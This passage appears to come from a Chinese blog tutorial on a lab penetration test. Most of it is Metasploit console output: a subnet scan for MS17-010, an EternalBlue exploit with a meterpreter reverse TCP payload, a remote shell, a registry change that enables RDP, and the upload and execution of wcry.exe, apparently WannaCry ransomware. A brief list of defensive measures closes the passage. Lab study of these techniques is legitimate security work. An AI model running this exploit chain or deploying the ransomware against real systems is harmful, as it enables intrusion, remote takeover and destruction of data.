        [-] 192.168.50.224:445    - Rex::HostUnreachable: The host (192.168.50.224:445) was unreachable.
        [-] 192.168.50.226:445    - Rex::HostUnreachable: The host (192.168.50.226:445) was unreachable.
        [-] 192.168.50.223:445    - Rex::HostUnreachable: The host (192.168.50.223:445) was unreachable.
        [-] 192.168.50.229:445    - Rex::HostUnreachable: The host (192.168.50.229:445) was unreachable.
        [-] 192.168.50.228:445    - Rex::HostUnreachable: The host (192.168.50.228:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 231 of 256 hosts (90% complete)
        [-] 192.168.50.230:445    - Rex::HostUnreachable: The host (192.168.50.230:445) was unreachable.
        [-] 192.168.50.231:445    - Rex::HostUnreachable: The host (192.168.50.231:445) was unreachable.
        [-] 192.168.50.232:445    - Rex::HostUnreachable: The host (192.168.50.232:445) was unreachable.
        [-] 192.168.50.235:445    - Rex::HostUnreachable: The host (192.168.50.235:445) was unreachable.
        [-] 192.168.50.236:445    - Rex::HostUnreachable: The host (192.168.50.236:445) was unreachable.
        [-] 192.168.50.233:445    - Rex::HostUnreachable: The host (192.168.50.233:445) was unreachable.
        [-] 192.168.50.255:445    - Rex::HostUnreachable: The host (192.168.50.255:445) was unreachable.
        [+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
        [-] 192.168.50.238:445    - Rex::HostUnreachable: The host (192.168.50.238:445) was unreachable.
        [-] 192.168.50.240:445    - Rex::HostUnreachable: The host (192.168.50.240:445) was unreachable.
        [-] 192.168.50.237:445    - Rex::HostUnreachable: The host (192.168.50.237:445) was unreachable.
        [-] 192.168.50.239:445    - Rex::HostUnreachable: The host (192.168.50.239:445) was unreachable.
        [-] 192.168.50.241:445    - Rex::HostUnreachable: The host (192.168.50.241:445) was unreachable.
        [-] 192.168.50.242:445    - Rex::HostUnreachable: The host (192.168.50.242:445) was unreachable.
        [-] 192.168.50.243:445    - Rex::HostUnreachable: The host (192.168.50.243:445) was unreachable.
        [-] 192.168.50.245:445    - Rex::HostUnreachable: The host (192.168.50.245:445) was unreachable.
        [-] 192.168.50.247:445    - Rex::HostUnreachable: The host (192.168.50.247:445) was unreachable.
        [-] 192.168.50.249:445    - Rex::HostUnreachable: The host (192.168.50.249:445) was unreachable.
        [-] 192.168.50.246:445    - Rex::HostUnreachable: The host (192.168.50.246:445) was unreachable.
        [-] 192.168.50.250:445    - Rex::HostUnreachable: The host (192.168.50.250:445) was unreachable.
        [-] 192.168.50.248:445    - Rex::HostUnreachable: The host (192.168.50.248:445) was unreachable.
        [-] 192.168.50.244:445    - Rex::HostUnreachable: The host (192.168.50.244:445) was unreachable.
        [-] 192.168.50.251:445    - Rex::HostUnreachable: The host (192.168.50.251:445) was unreachable.
        [-] 192.168.50.254:445    - Rex::HostUnreachable: The host (192.168.50.254:445) was unreachable.
        [-] 192.168.50.253:445    - Rex::HostUnreachable: The host (192.168.50.253:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 256 of 256 hosts (100% complete)
        [*] Auxiliary module execution completed
        msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
        [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
        msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
        
        Compatible Payloads
        ===================
        
           #   Name                                                Disclosure Date  Rank    Check  Description
           -   ----                                                ---------------  ----    -----  -----------
           0   payload/generic/custom                                               normal  No     Custom Payload
           1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
           2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
           3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
           4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
           5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
           6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
           7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
           8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
           9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
           10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
           11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
           12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
           13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
           14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
           15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
           16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
           17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
           18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
           19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
           20  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
           21  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
           22  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
           23  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
           24  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
           25  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
           26  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
           27  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
           28  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
           29  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
           30  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
           31  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
           32  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
           33  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
           34  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
           35  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
           36  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
           37  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
           38  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
           39  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
           40  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
           41  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
           42  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
           43  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
           44  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
           45  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
           46  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
           47  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
           48  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
           49  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
           50  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
           51  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
           52  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
           53  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
           54  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
           55  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
           56  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
        
        msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
        payload => windows/x64/meterpreter/reverse_tcp
        msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.252
        rhost => 192.168.50.252
        msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.153
        lhost => 192.168.50.153
        msf6 exploit(windows/smb/ms17_010_eternalblue) > run
        
        [*] Started reverse TCP handler on 192.168.50.153:4444
        [*] 192.168.50.252:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
        [+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
        [*] 192.168.50.252:445    - Scanned 1 of 1 hosts (100% complete)
        [+] 192.168.50.252:445 - The target is vulnerable.
        [*] 192.168.50.252:445 - Connecting to target for exploitation.
        [+] 192.168.50.252:445 - Connection established for exploitation.
        [+] 192.168.50.252:445 - Target OS selected valid for OS indicated by SMB reply
        [*] 192.168.50.252:445 - CORE raw buffer dump (53 bytes)
        [*] 192.168.50.252:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
        [*] 192.168.50.252:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
        [*] 192.168.50.252:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
        [*] 192.168.50.252:445 - 0x00000030  61 63 6b 20 31                                   ack 1
        [+] 192.168.50.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
        [*] 192.168.50.252:445 - Trying exploit with 12 Groom Allocations.
        [*] 192.168.50.252:445 - Sending all but last fragment of exploit packet
        [*] 192.168.50.252:445 - Starting non-paged pool grooming
        [+] 192.168.50.252:445 - Sending SMBv2 buffers
        [+] 192.168.50.252:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
        [*] 192.168.50.252:445 - Sending final SMBv2 buffers.
        [*] 192.168.50.252:445 - Sending last fragment of exploit packet!
        [*] 192.168.50.252:445 - Receiving response from exploit packet
        [+] 192.168.50.252:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
        [*] 192.168.50.252:445 - Sending egg to corrupted connection.
        [*] 192.168.50.252:445 - Triggering free of corrupted buffer.
        [*] Sending stage (200262 bytes) to 192.168.50.252
        [*] Meterpreter session 1 opened (192.168.50.153:4444 -> 192.168.50.252:49159) at 2023-09-26 16:54:26 +0800
        [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        
        meterpreter > sysinfo
        Computer        : WIN-H42D9A3N5M3
        OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
        Architecture    : x64
        System Language : zh_CN
        Domain          : WORKGROUP
        Logged On Users : 2
        Meterpreter     : x64/windows
        meterpreter > ipconfig
        
        Interface  1
        ============
        Name         : Software Loopback Interface 1
        Hardware MAC : 00:00:00:00:00:00
        MTU          : 4294967295
        IPv4 Address : 127.0.0.1
        IPv4 Netmask : 255.0.0.0
        IPv6 Address : ::1
        IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
        
        
        Interface 11
        ============
        Name         : Intel(R) PRO/1000 MT Network Connection
        Hardware MAC : 00:0c:29:92:c2:44
        MTU          : 1500
        IPv4 Address : 192.168.50.252
        IPv4 Netmask : 255.255.255.0
        IPv6 Address : fe80::742a:8f0e:f788:d1a5
        IPv6 Netmask : ffff:ffff:ffff:ffff::
        
        
        Interface 12
        ============
        Name         : Microsoft ISATAP Adapter
        Hardware MAC : 00:00:00:00:00:00
        MTU          : 1280
        IPv6 Address : fe80::5efe:c0a8:32fc
        IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
        
        meterpreter > shell
        Process 1288 created.
        Channel 1 created.
        Microsoft Windows [�汾 6.1.7601]
        ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
        
        C:\Windows\system32>net user
        net user
        
        \\ ���û��ʻ�
        
        -------------------------------------------------------------------------------
        Administrator            EricWee                  Guest
        �����������ϣ�������һ��������������
        
        
        C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
        �����ɹ����ɡ�
        
        C:\Windows\system32>exit
        exit
        meterpreter > backgroud
        [-] Unknown command: backgroud
        meterpreter > background
        [*] Backgrounding session 1...
        msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
        [*] Starting interaction with 1...
        
        meterpreter > upload /home/kali/Downloads/wcry.ext C:\\
        [-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - /home/kali/Downloads/wcry.ext
        meterpreter > upload /home/kali/Downloads/wcry.exe C:\\
        [*] uploading  : /home/kali/Downloads/wcry.exe -> C:\
        [*] uploaded   : /home/kali/Downloads/wcry.exe -> C:\\wcry.exe
        meterpreter > execute -f c:\\wcry.exe
        

        从Linux远程登录windows系统

        rdesktop 192.168.50.252
        

        image-20230926172213173

    • 防御技术

      • 探测和扫描防护 - 使用防火墙来判断访问行为是否是扫描,如果判断是,则拒绝所有访问

      • 暴力破解防护

        • 设置账户登录失败的锁定策略
        • 增加图形验证码
        • 增强密码强度,定期更改密码
        • 使用双因素认证
      • 危险服务的防护

        • 在无绝对必要的情况下,尽量关闭风险服务

        • RDP - 使用ACL只允许网管机登陆

        • Telnet - 建议使用SSH来代替

        • SSH - 使用密码+公钥文件的方式来验证登录 - 可以使用SecureCRT生成公钥文件

        • SMB - 关闭默认隐藏共享 ,重启后服务器自动共享

          net share
          
          net share C$ del
          
          net share admin$ del
          
          上面的脚本创建sharedel.bat, 在本地组策略编辑器中(gpedit.msc),用户开机后自动执行这个脚本。
          

          image-20230926173818894

          image-20230926174530312

posted @ 2023-09-26 17:46  晨风_Eric  阅读(147)  评论(0编辑  收藏  举报